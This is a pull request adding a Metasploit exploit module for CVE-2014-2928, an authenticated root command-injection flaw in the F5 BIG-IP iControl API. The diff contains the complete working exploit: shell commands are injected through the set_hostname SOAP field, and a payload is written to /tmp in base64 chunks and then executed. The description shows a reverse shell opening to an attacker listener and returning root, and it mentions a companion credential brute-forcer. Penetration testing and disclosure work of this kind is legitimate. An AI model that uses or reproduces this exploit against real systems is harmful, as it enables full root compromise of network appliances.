### PR TITLE
Create f5_icontrol_exec.rb

### DIFF
--- a/modules/exploits/linux/http/f5_icontrol_exec.rb
+++ b/modules/exploits/linux/http/f5_icontrol_exec.rb
@@ -6,17 +6,17 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking # Configuration is overwritten and service reloaded
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info,
       'Name'           => "F5 iControl Remote Root Command Execution",
       'Description'    => %q{
         This module exploits an authenticated remote command execution
-        vulnerability in the F5 BIGIP iControl API.
+        vulnerability in the F5 BIGIP iControl API (and likely other
+        F5 devices).
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -25,6 +25,8 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'     =>
         [
+          ['CVE', '2014-2928'],
+          ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
         ],
       'Platform'       => ['unix'],
       'Arch'           => ARCH_CMD,
@@ -47,8 +49,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    basic_auth = Rex::Text.encode_base64(datastore['USERNAME']+':'+datastore['PASSWORD'])
-
     get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
     <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
     <SOAP-ENV:Body>
@@ -60,10 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
       'method' => 'POST',
-      'headers' => {
-        'Authorization' => 'Basic ' + basic_auth
-      },
-      'data' => get_hostname
+      'data' => get_hostname,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
     })
 
     res.body =~ /y:string">(.*)<\/return/
@@ -73,10 +72,9 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
       'method' => 'POST',
-      'headers' => {
-        'Authorization' => 'Basic ' + basic_auth
-      },
-      'data' => get_hostname
+      'data' => get_hostname,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
     })
 
     res.body =~ /y:string">(.*)<\/return/
@@ -96,10 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote
       send_request_cgi({
         'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
         'method' => 'POST',
-        'headers' => {
-          'Authorization' => 'Basic ' + basic_auth
-        },
-        'data' => pay
+        'data' => pay,
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
       })
 
       return Exploit::CheckCode::Vulnerable
@@ -109,8 +106,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def send_cmd(cmd)
-    basic_auth = Rex::Text.encode_base64(datastore['USERNAME']+':'+datastore['PASSWORD'])
-
     pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
       <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
       <SOAP-ENV:Body>
@@ -124,10 +119,9 @@ class Metasploit3 < Msf::Exploit::Remote
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
       'method' => 'POST',
-      'headers' => {
-        'Authorization' => 'Basic ' + basic_auth
-      },
-      'data' => pay
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
     })
   end
 

--- a/modules/exploits/linux/http/f5_icontrol_exec.rb
+++ b/modules/exploits/linux/http/f5_icontrol_exec.rb
@@ -1,0 +1,149 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking # Configuration is overwritten and service reloaded
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "F5 iControl Remote Root Command Execution",
+      'Description'    => %q{
+        This module exploits an authenticated remote command execution
+        vulnerability in the F5 BIGIP iControl API.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'bperry' # Discovery, Metasploit module
+        ],
+      'References'     =>
+        [
+        ],
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['F5 iControl', {}]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Sep 17 2013",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(443),
+          OptBool.new('SSL', [true, 'Use SSL', true]),
+          OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
+          OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
+          OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
+        ], self.class)
+  end
+
+  def check
+    basic_auth = Rex::Text.encode_base64(datastore['USERNAME']+':'+datastore['PASSWORD'])
+
+    get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
+    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
+    <SOAP-ENV:Body>
+    <n1:get_hostname xmlns:n1="urn:iControl:System/Inet" />
+    </SOAP-ENV:Body>
+    </SOAP-ENV:Envelope>
+    }
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'headers' => {
+        'Authorization' => 'Basic ' + basic_auth
+      },
+      'data' => get_hostname
+    })
+
+    res.body =~ /y:string">(.*)<\/return/
+    hostname = $1
+    send_cmd("whoami")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'headers' => {
+        'Authorization' => 'Basic ' + basic_auth
+      },
+      'data' => get_hostname
+    })
+
+    res.body =~ /y:string">(.*)<\/return/
+    new_hostname = $1
+
+    if new_hostname == "root.a.b"
+      pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
+        <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
+        <SOAP-ENV:Body>
+        <n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
+        <hostname>#{hostname}</hostname>
+        </n1:set_hostname>
+        </SOAP-ENV:Body>
+        </SOAP-ENV:Envelope>
+      }
+
+      send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+        'method' => 'POST',
+        'headers' => {
+          'Authorization' => 'Basic ' + basic_auth
+        },
+        'data' => pay
+      })
+
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def send_cmd(cmd)
+    basic_auth = Rex::Text.encode_base64(datastore['USERNAME']+':'+datastore['PASSWORD'])
+
+    pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
+      <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
+      <SOAP-ENV:Body>
+      <n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
+        <hostname>`#{cmd}`.a.b</hostname>
+        </n1:set_hostname>
+        </SOAP-ENV:Body>
+        </SOAP-ENV:Envelope>
+    }
+
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'headers' => {
+        'Authorization' => 'Basic ' + basic_auth
+      },
+      'data' => pay
+    })
+  end
+
+  def exploit
+    filename = Rex::Text.rand_text_alpha_lower(5)
+
+    print_status('Sending payload in chunks, might take a small bit...')
+    i = 0
+    while i < payload.encoded.length
+      cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}"
+      send_cmd(cmd)
+      i = i + 5
+    end
+
+    print_status('Triggering payload...')
+
+    send_cmd("sh /tmp/#{filename}")
+  end
+end


### PR DESCRIPTION
This module will exploit CVE-2014-2928, an authenticated command execution as root vulnerability in the iControl API on F5 appliances. This module was demoed in my Derbycon talk. A second module is PR'ed along side this to brute force credentials in the iControl API.

http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html

Any user with access to the API can become the root user on the box.

```
msf exploit(f5_icontrol_exec) > show options

Module options (exploit/linux/http/f5_icontrol_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       The password to authenticate with
   Proxies                     no        Use a proxy chain
   RHOST      192.168.209.4    yes       The target address
   RPORT      443              yes       The target port
   SSL        true             yes       Use SSL
   TARGETURI  /                yes       The base path to the iControl installation
   USERNAME   admin            yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.209.3    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   F5 iControl


msf exploit(f5_icontrol_exec) > exploit

[*] Sending payload in chunks, might take a small bit...
[*] Started reverse double handler
[*] Triggering payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo MItQndpb3hjQKkBL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "MItQndpb3hjQKkBL\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (192.168.209.3:4444 -> 192.168.209.4:60494) at 2014-09-27 08:45:50 -0700

id
uid=0(root) gid=0(root) context=system_u:system_r:f5util_t

```

F5 has known about this since February of this year, and it still isn't patched it seems. You can download a BIGIP appliance trial from F5's website.
